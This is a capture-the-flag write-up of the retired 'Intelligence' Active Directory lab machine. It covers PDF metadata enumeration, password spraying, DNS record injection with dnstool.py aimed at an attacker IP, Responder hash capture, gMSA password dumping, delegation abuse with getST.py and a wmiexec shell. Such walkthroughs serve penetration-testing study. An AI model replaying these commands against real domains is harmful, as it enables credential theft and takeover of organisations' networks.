Intelligence machine is an intentionally vulnerable machine with Windows operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan
Full Port Scan
As a result of the network scan, we see that we encountered an Active Directory machine and we see domains intelligence.htb, dc.intelligence.htb and we added them to the /etc/hosts file.
I provide Ldap enumeration;
We could not obtain information anonymously.
I provide rpc enumeration
We got Access denied error anonymously.
I provide http enumeration over port 80
Here we did not find anything in the source code and developer mode, we provided file and directory scanning and we did not find any results. I saw the pdf download parts through the interface
Here the files are added in a certain order
Looks like it’s timed. Let’s download these pdfs to our machine and look at the metadata with exiftool.
Here we can see usernames and we note them down.
We guess that the pdf names are sorted by a date, so we will provide a directory scan to see if there are any other pdfs like this. First, let’s create a directorylist in the name format.
I am preparing a bash script
#!/bin/bash
start=2020-01-01
end=2022-01-01
while ! [[ $start > $end ]]; do
echo $start
start=$(date -d “$start + 1 day” +%F)
done
I write in it.
It creates data here.
Then I run “sed -i s/$/-upload.pdf/ datelist.txt” to add -upload.pdf at the end.
Now I have my wordlist ready.
Now here I am scanning with gobuster to see which ones we will detect.
We detected quite a few files, and we wrote the files to files.txt.
Then I use the sed command to find and replace the ones that are contrary to the wordlist here.
Now here I am using wget to pull the files
After extracting all the files, I use both exiftool and grep to find the creted names
I pulled the user names here, let’s see if there is any passowrd information that is useful in these pdf names
Here
NewIntelligenceCorpUser9876
We have detected the password of which users this password is used, let’s do password spray.
intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
credential information.
Let’s try to connect using this information
Here we were able to get and read user.txt. I continued to provide smb enumeration.
downdetector.ps1 file is remarkable
Downdector.ps1; there is a simple script that has a loop to get all the records from AD. It then uses Invoke-WebRequest with the name list and performs the authentication attempts. So we know we need to add a DNS record pointing to us and then we can capture that authentication request. Since we know that the for loop iterates over all DNS records starting with the string “web” AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones, DC=intelligence,DC=htb, we can try to inject our own DNS record that starts with this string and points to our attacker machine. This way we can leak the credentials of the request. A good tool for this is dnstool by Dirk-jan Mollema.
Let’s do DNS Poisoning first,
To do this I will use dnstool.py, which is included in https://github.com/dirkjanm/krbrelayx.
python3 dnstool.py -u ‘intelligence.htb\Tiffany.Molina’ -p ‘NewIntelligenceCorpUser9876’ -a add -r ‘webpencer.intelligence.htb’ -d 10.10.14.19 10.10.10.248
Here we initialized DNS
Now we start with responder and wait for this five minute cycle for the script to reach us and try to authenticate:
Ted.Graves’s After a few minutes we receive a web request with the user’s credentials. Here we obtained the hash from the user ted.graves
Now let’s try to break it with john.
Mr. Teddy (Ted.Graves)
We’re detecting credential information.
Here we tried to connect remotely but we couldn’t. Let’s collect information remotely with Bloound hound.
bloodhound-python -d intelligence.htb -u Ted.Graves -p Mr.Teddy -ns 10.10.10.248 -c All
I throw the resulting json files in blooundhouns
look for the user Ted.Graves at the top left and select it. mark it as owened.
Then I look at the groupdelegation section
Here we understand that we can get access to the svc_INT group using ReadGMSAPassword
GMSAPassword: Group Manage Service Accounts (GMSA) provides additional security to service accounts. After services are configured to use the gMSA principal, account password management is handled by the Windows operating system (OS).
We get help in the Help section
We can use the python tool gMSADumper to extract GMSA passwords
We have seen the use of the gMSADumper tool in the Linux avuse section, I use this tool
Here we got the hash value.
6c986cdcb965f2607f894fb257417f8e
Since we have the Service Principal Name (SPN,) of the domain conroller, we should have everything we need to get a Tick Grantign Ticket (TGT) for the admin user. Now that we have the gMSA account, the next step is to find the administrator user’s information. Therefore we need to impersonate the administrator and request a Service Ticket. To do this I will use the getST.py tool impackt.
-spn: target host
-hash: password hash for authentication
-dc-ip: domain IP
-impersonate: target user
We will use the parameters
To find the spn, let’s see which delegation it allows from user svc_int
We’ve detected www/dc.intelligence.htb spn.
I am writing the requirements
Here we got an error clock skew too greate. This is because kerberos is time dependent and as we see when we scan the host with nmap, the time difference between the host and the target is 7 hours. We fix this by synchronizing our time with the target time.
To synchronize, we first disable automatic time synchronization by running
Timedatectl set-ntp 0
Immediately afterwards we synchronize time with the target
ntpdate -s intellegence.htb
After completing the synchronization process, we run our command again
And the administrator ticket was saved in a ccache file (administrator.ccache) we didn’t get any error.
We try to log in using wmiexec from adminsirator user.
Before we do this we use an environment variable called “KRB5CCNAME” pointing to the file to make sure we are using the generated TGT for kerberos authentication. We then use wmiexec to instruct it to authenticate using kerberos.
This is how we got the shell.
This is how we got the root flag.